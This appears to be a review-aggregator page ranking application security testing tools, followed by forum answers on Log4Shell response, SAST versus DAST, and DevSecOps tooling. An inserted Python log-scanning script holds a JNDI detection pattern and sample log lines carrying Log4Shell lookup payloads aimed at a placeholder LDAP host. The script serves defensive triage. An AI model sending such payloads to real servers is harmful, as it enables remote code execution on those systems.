
Top 8 Application Security Testing (AST) Tools

Veracode, Checkmarx, PortSwigger Burp Suite Professional, Micro Focus Fortify on Demand, GitLab, OWASP Zap, Contrast Security Assess, Acunetix by Invicti
  1. There is a single area on the dashboard where you can get a full view of all of the tests and the results from everything. There is a nice, very simple graphic that shows you the types of vulnerabilities that were found, their severity, the scoring, and in what part of the code they were found. All the details are together in one place.
  2. The solution is scalable, but other solutions are better. The solution has good performance; it is able to compute in 10 to 15 minutes.
  3. We use the solution for vulnerability assessment in respect of the application and the sites. The automated scan is what I find most useful because a lot of customers will need it. Not every domain will be looking for complete security; they just need a stamp on the security key. For these kinds of customers, the scan works really well.
  4. There is not one feature we find valuable. The idea is to integrate the solution in DevSecOps, which we were able to do. We were working with a different solution called SolarCloud previously and it was limited. We are trying to find the right level of security for our needs.
  5. GitLab integrates well with other platforms. We like that we can have an all-encompassing product and don't have to implement different solutions.
  6. It has evolved over the years, and recently, in the last year, they have added HUD (Heads Up Display). They offer free access to some other tools.
  7. The solution is very accurate in identifying vulnerabilities. In cases where we are performing application assessment using Contrast Assess, and also using legacy application security testing tools, Contrast successfully identifies the same vulnerabilities that the other tools have identified, but it also identifies significantly more. In addition, it has visibility into application components that other testing methodologies are unaware of.
  8. There is a lot of documentation on their website, which makes setting it up and using it quite simple. Overall, it's a very good tool and a very good engine.

Advice From The Community

Read answers to top Application Security Testing (AST) questions.
Evgeny Belenky
Hi peers, I believe many of you have already heard of the recent Log4j/Log4Shell vulnerability that allows attackers to perform remote code execution (RCE). What does it mean for an organization? How can you check whether you're vulnerable and mitigate/patch it now, if at all? Lastly, what impact do you see this having in the near future? Thanks
SimonClark

This vulnerability is particularly critical because Log4j is widely used in open source and commercial software, and remote exploitation of the vulnerability against any internet-facing server is trivial using a single HTTP POST. Exploitation results in full system compromise. The vulnerability has a CVSS score of 10 out of a possible 10, meaning it is as bad as it gets.

Our SOC has launched a new app that detects the presence of vulnerable versions of Log4j; however, detecting it does not mean you have been exploited.

My advice: scan your network to get a full visibility report, i.e. find all your legacy and shadow IT that you didn't know existed, which means you should find all potential instances of Log4j; patch all of the Log4j environments; monitor your systems 24/7 using your SOC; and if you don't have a SOC, invest in a Managed SOC provider.

ITSecuri7cfd (IT Security Coordinator at a healthcare company with 10,001+ employees)

Yet another chance to test our incident response procedures. 

So far I would say we're a B: good on the process, an A on team response and interactions, and about a B on reducing threat risk.

Identifying your external assets exposed to this vulnerability, and mitigating or patching (if available) the threat, is your team's #1 priority.

You also have to notify and communicate with any 3rd party to make sure they're aware so they can start the same process. You ALSO need to be fully aware of your vendors' weaknesses and defenses (mitigations, patches, knowledge and reaction time).

Then be prepared to roll out patches or, in this case, shut systems down OR put mitigations in place immediately to mitigate risk to the entire environment.

Jairo Willian Pereira

One excellent opportunity for the company to test your CMDB/Inventory (at medium and big companies). 

Tenable and, I think, other vulnerability scanners offer a specific plugin used to check your infrastructure against Log4shell.

If you don't have a VS, you can try looking at your logging system for evidence or use:

In the future, pre-defined and applied patch management schedules need to come first (proactive), ahead of scanner/vulnerability findings (reactive).
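Jairo's suggestion to look at the logging system for evidence, as an added example that is not part of the post: a Python triage script that URL-decodes web access-log lines and flags the JNDI lookup string Log4Shell relies on. It assumes Combined Log Format access logs; the sample lines are constructed.

```python
"""Scan web access logs for Log4Shell lookup strings (added example, not from the post)."""
import re
from urllib.parse import unquote

# Constructed sample in Combined Log Format (assumption: Apache/Nginx-style access logs).
# Line 1 is benign; line 2 carries the lookup in the User-Agent; line 3 carries it URL-encoded in the path.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"
198.51.100.7 - - [11/Dec/2021:10:00:03 +0000] "GET /%24%7Bjndi%3Aldap%3A//example.invalid/a%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
"""

# Core indicator: a Log4j lookup with the "jndi" prefix. Obfuscated variants exist,
# so treat a clean result as a first-pass triage signal, not proof of absence.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(line: str) -> str:
    """URL-decode twice so single- and double-encoded requests are compared in plain form."""
    for _ in range(2):
        line = unquote(line)
    return line


def find_jndi_lookups(log_text: str) -> list:
    """Return one record per log line that contains a JNDI lookup after decoding."""
    hits = []
    for lineno, raw in enumerate(log_text.splitlines(), start=1):
        decoded = normalize(raw)
        match = JNDI_RE.search(decoded)
        if match is None:
            continue
        hits.append({
            "line": lineno,
            "source_ip": raw.split(" ", 1)[0],   # first field of the access-log line
            "snippet": decoded[match.start():match.start() + 40],
        })
    return hits


def summarize_by_source(hits: list) -> dict:
    """Count hits per source IP so the noisiest sources can be triaged first."""
    counts = {}
    for hit in hits:
        counts[hit["source_ip"]] = counts.get(hit["source_ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = find_jndi_lookups(SAMPLE_LOG)
    for hit in found:
        print(f"line {hit['line']} from {hit['source_ip']}: {hit['snippet']}")
    print(summarize_by_source(found))
```

A hit only shows that a lookup string reached the server; whether the host actually resolved it depends on the Log4j version and configuration, so confirm against the inventory from your scanner.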

reviewer1572348 (Chief Architect at a computer software company with 10,001+ employees)

WhiteSource has released a utility to detect the log4j vulnerability in the codebase.

Take a look at this if it helps. In our case, a lot of projects use Elasticsearch and Azure DevOps Server; both of them use log4j, and that's where additional fixes have to be done.

Charles Race
I'm choosing an Application Security Testing platform. My use cases are as follows:

  • SAST
  • DAST
  • Component Scanning
  • Vulnerability auditing
  • Mitigation

What product/solution would you recommend and why?
Thomas Ryan

The first thing you'd want to do is:

1. Look at your application inventory to determine the language and framework coverage.

2. Ask which tool has developer integrations with my current and future-state CI/CD toolset and developer IDEs.

3. Do I have the security team to support it? This helps determine vendor and approach. I say Fortify as they are the only Hybrid (Cloud and On-Premise) approach.

4. Does this need to be Cloud or On-Premise?

My most successful customers have used the following:

  • SAST - Hybrid of Fortify on-premise and Fortify on Demand; if support is needed for Perl or Groovy, buy some CheckMarx to cover that gap and correlate findings with Saltworks SaltMiner.

  • DAST - WebInspect/ScanCentral & Fortify on Demand

  • Component Scanning - The most successful deployments have been with SonaType due to the Fortify integration. Blackduck, WhiteSource, and Snyk also manage plugins to Fortify SSC. If there is no budget, use OWASP Dependency Track to build your use case for a more robust Composition Analysis tool.

  • Vulnerability auditing - Done within Fortify SSC or Fortify OnDemand

  • Mitigation - Your Team, but if consulting is needed I would recommend Saltworks Security, Deloitte, Accenture & Cigital which have a reputation for managing Fortify programs.

Ping me if you need further guidance.

SivaKrishna

The best application security testing platforms include GitHub, GitLab, HCL AppScan, Netsparker, Acunetix Vulnerability Scanner, Pentest-Tools.com, Detectify Deep Scan, Appknox, Checkmarx, and Micro Focus Fortify On Demand. 

VishalDhamke

SAST - Veracode, goes well with integration

DAST - Either Microfocus Webinspect or Burp Suite Professional or OWASP ZAP (Open Source)

Component Scanning - Blackduck or Sonatype Nexus Platform or Whitesource Bolt 

Vulnerability Auditing - Nessus & CIS-CAT (Assessor Pro) or Qualys

Mitigation - Team effort; for Security Orchestration - Threadfix or ZeroNorth

reviewer1572348 (Chief Architect at a computer software company with 10,001+ employees)

Hello @Charles Race,

A lot of responses already on this one. Considerations will include on-premises vs SaaS, and one tool vs a modular approach using different tools. I will share some additional details.

1. Snyk: It can do SAST, SCA, Containers, IaC scripts - all 4. They have 4 products as part of their SaaS platform. It's commercial and has an open-source version with limited capabilities. Their on-premises scanner is in private beta.

2. Clouddefense.AI: It can do SAST, DAST, SCA, etc. Commercial SaaS platform. Uses ZAP rules behind the scenes for DAST.

3. Synopsys: Great product, the leader in Gartner MQ 2021. Can do IAST as well.

4. SonarQube Enterprise Licensed Deployment is an excellent product for SAST. It supports 27+ languages including SQL, strong reporting capabilities, trend analysis.

If you need to do CSPM (Cloud Security Posture Management), you will need to look at others like Prisma Cloud.

Hope this helps.

Rogerio Goncalves

Hi, my name is Rogerio from Xmart Solutions Brazil (we are an independent consultancy that represents several AST solutions). Some factors are important to evaluate, such as:

How many SAST applications (static analysis) and how often will you do the analysis? How many analyses (URLs) will you do dynamically?

What are your sprints? Do you have internal development or third parties?

Which languages from your legacy? How will you implement integrations? What tools?

Would you like to have everything automated?

These are just a few questions for your decision.

I hope I've contributed.

Raghavendra Rao PV

I suggest going for a Secure SDLC approach by integrating security at each level of the development life cycle. If you are constrained to select just one from the above, then start with DAST, as it helps simulate real-time attacks on your production application and thus helps you address the most glaring issues.

W_K

Kiuwan - scan for 3rd party libs

SonarQube - CI/CD integration with low price

Cuneyt KALPAKOGLU Phd.

I would like you to buy CHECKMARX as a SAST tool and have a look at KONDUKTO, which embeds security tests into DevOps pipelines in an automated fashion using both open source and commercial security tools.

Vulnerabilities coming from different sources, be it from penetration tests, bug bounty programs or automated tools, can be managed in a single platform to provide a unified view. With its unique process automation and CI/CD integration capabilities, Kondukto helps to scale AppSec effort and paves the way for DevSecOps.

My advice is to pay attention to the following:

✔ Visibility into vulnerabilities in native environments leads to improved security awareness among developers.

✔ Custom-tailored training programs based on the vulnerabilities created by each developer and team increase the ROI of training.

✔ Remediation database allows developers to benefit from the know-how accumulated in the company and fix vulnerabilities faster.

Hi, many companies wonder whether SAST or DAST is better for application security testing. What are the relative benefits of each methodology? Is it possible to make use of both?
Dan Doggendorf

SAST and DAST are not mutually exclusive and should be used in conjunction with each other. One should be used by the developers to ensure security is being addressed as they are writing the code. The other is used for evaluating existing applications already in production to ensure they are not susceptible to any new vulnerabilities that have been discovered.

The real question is which should have a higher priority when it comes to introducing the concepts into your application security model. Unfortunately, there is no single answer to which comes first. It all depends on your organization's culture, business model, and your relationships with the various impacted groups.

Thomas Ryan

The easiest way to remember the role of each:

SCA & SAST = Am I Vulnerable?
DAST & IAST = Am I Exploitable? (In some cases, together they complement SAST.)
RASP & WAF = Can I Protect Myself? (Fixing the code is the primary option.)

Oscar Van Der Meer

For application security you ideally need SAST, SCA and DAST. You need all three as they essentially measure different things:

SAST identifies bad coding practices that potentially could be exploited.

SCA identifies known vulnerabilities in the libraries and components you are using, and this is the main attack vector on applications.

DAST identifies some of the weaknesses that SAST and SCA identified, but also identifies weaknesses in the configuration. You might have the perfect application code with zero vulnerabilities, but if it is misconfigured, for instance using a default password, it still can be breached.

If you have to choose, look at SCA and then DAST first, as that gives you the best bang for your buck from a risk reduction perspective.

reviewer1572348 (Chief Architect at a computer software company with 10,001+ employees)

Both SAST and DAST are complementary to each other. The best approach is to include both SAST and DAST.

SAST: Inspects underlying source code, requires understanding of source design, is utilized early in the development cycle, and the average cost to remediate issues is low.

DAST: Requires the application running, performs hacker-like (black box) testing, is utilized much later in the development cycle, and the average cost to remediate issues is higher.

If we look at OWASP Top 10 2021 changes, SAST or DAST will not cover all of them individually. In addition, we also need SCA to be done to look at open source vulnerabilities.

Curtis Yanko (Shiftleft)

It's a false choice of a question, but DAST exists because folks don't trust their SAST tool. DAST is good about true positives but bad about false negatives. SAST just has a reputation for false positives, but a new generation of SAST tools do a much better job.

Russell Webster

Both. They are not in competition with each other.
SAST is used for analyzing your written code for practices and patterns that are risky or vulnerable.
DAST is used at runtime for analyzing the app for vulnerabilities as shown in other ways on the runtime memory stack, etc.
Both provide different value.

Look into RASP vs DAST vs IAST as well.

What are the different types of tools that should be used together in DevSecOps? What are the specific tools that you like to use when working on your DevSecOps pipeline?  What is essential, and what is a nice-to-have? 
Thomas Ryan

Everything in technology focuses on People, Process & Technology. What binds these together is business requirements and understanding the needs of each Line of Business. Often each Line of Business has completely different requirements, so the question is which tools help you meet that unified vision and executive dashboard reporting to measure your KPIs.

  1. Code Repos – GitHub, GitLab

  2. Build Servers – Azure DevOps, Jenkins, Bamboo, TeamCity

  3. Code Quality - SonarQube

  4. Software Composition Analysis (SCA) – Sonatype (Fortify Integration), Snyk, & BlackDuck

  5. Static Analysis (SAST) – Fortify On Premise, Fortify OnDemand (or Hybrid); CheckMarx (fills the APEX, Perl, Groovy, etc. gap that Fortify doesn't cover)

  6. Infrastructure As Code (IaaC) – Aqua Security

  7. IAST – Not widely adopted due to agent limitations.

  8. DAST – WebInspect

    1. ScanCentral provides the most automation and scalability

    2. Highly Flexible API for Automation

  9. Metric Reporting – SaltMiner (Saltworks Security), Fortify SSC, Fortify OnDemand

  10. IDE (Eclipse, Visual Studio, JetBrains) – Fortify

  11. Continuous Monitoring - BitDiscovery

Why so much Fortify? It has been around 17 years; while it is old, it is constantly evolving. It is the only Hybrid (Cloud & On-Premise) solution, and it provides the flexibility needed for most customers. There is a reason why over 50% of Cigital's (Synopsys) business is managing Fortify and not the Synopsys tool suite. Deloitte, Accenture, IBM & Saltworks make a lot of money managing Fortify. One thing you won't hear from Gartner: Fortify SAST & DAST surpass their competitors' revenue by over 70%.

reviewer1572348 (Chief Architect at a computer software company with 10,001+ employees)

I believe we need to cover the SDLC from start to end as much as possible while ensuring that this does not mean too many dashboards and also keeping the cost of development in mind.

1. IDE Checks: This is the 1st step in a shift-left approach. Many open source tools integrate easily with IDEs (VSC, Eclipse, etc.) and allow developers to do a check even before they commit code on a local branch. We have leveraged SonarLint (https://www.sonarlint.org/), which covers a vast spectrum of programming languages and IDEs.

2. SAST: Many open source tools are available in this space which do a check around security vulnerabilities, security hotspots, etc. We use SonarQube.

3. SCA: Checking against open source security vulnerabilities and license compliance is very important. WhiteSource is what we use here.

4. IaC scan: We need tools to manage and analyze infrastructure as code (IaC) scan results across platforms and be able to resolve the issues.

5. Monitoring: Once the application is deployed into production, we need tools to monitor it live and be able to check for vulnerabilities and other issues which happen when hundreds of users are using the application from across the globe.

There are other areas like DAST, IAST which become important depending on size, complexity and business needs.

Rama Susarla

It depends on the budget, business and technology portfolio of the enterprise. 

If you have a predominantly web-based and service architecture-oriented technology portfolio, the Veracode set of tools (Greenlight, Veracode SAST, Veracode DAST) is a good option. Veracode is good if you have an enterprise-level DevSecOps transformation. But Veracode may not work well for legacy systems.

I have also used Micro Focus Fortify effectively. Just on SCA, the universally used SonarQube with standard plugins is what I prefer, as it is easy to use. All these tools are very easy to integrate into a DevSecOps application pipeline.

Jeremy Vaughan

Depends on budget and the larger approach to security, compliance, and risk. There are many solutions and approaches out there, but many limit the ability to scale DevSecOps beyond an experiment and justify it to business leaders. Standard response: SCA, SAST, DAST, IAST. Many of these tools are disconnected and some slow down performance quite a bit, especially your traditional household names. What are your goals and what are your constraints to developing a program?

Steve Arone

The detailed answers below are a good summary. How are teams pulling all these tools together and orchestrating in terms of agile stories and feedback loops? Azure DevOps, JIRA, ServiceNow, other?

Giorgio Riva

Hi, we think that a tool for applying static analysis technologies for code quality and security is essential.
